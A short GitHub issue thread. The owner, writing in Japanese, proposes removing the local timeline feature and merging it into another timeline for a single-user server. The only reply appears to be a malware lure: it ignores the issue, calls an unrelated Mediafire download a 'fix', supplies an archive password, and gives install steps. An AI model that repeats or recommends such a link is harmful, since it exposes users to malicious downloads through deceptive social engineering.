### ISSUE TITLE
LTL廃止

### ISSUE THREAD

**Issue by AmaseCocoa** [AmaseCocoa/m.amase.xyz#12]
### Summary

STLに統合する

### Purpose

そもそも一人用のサーバーを想定して改造してるので

### Do you want to implement this feature yourself?

- [X] Yes, I will implement this by myself and send a pull request

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
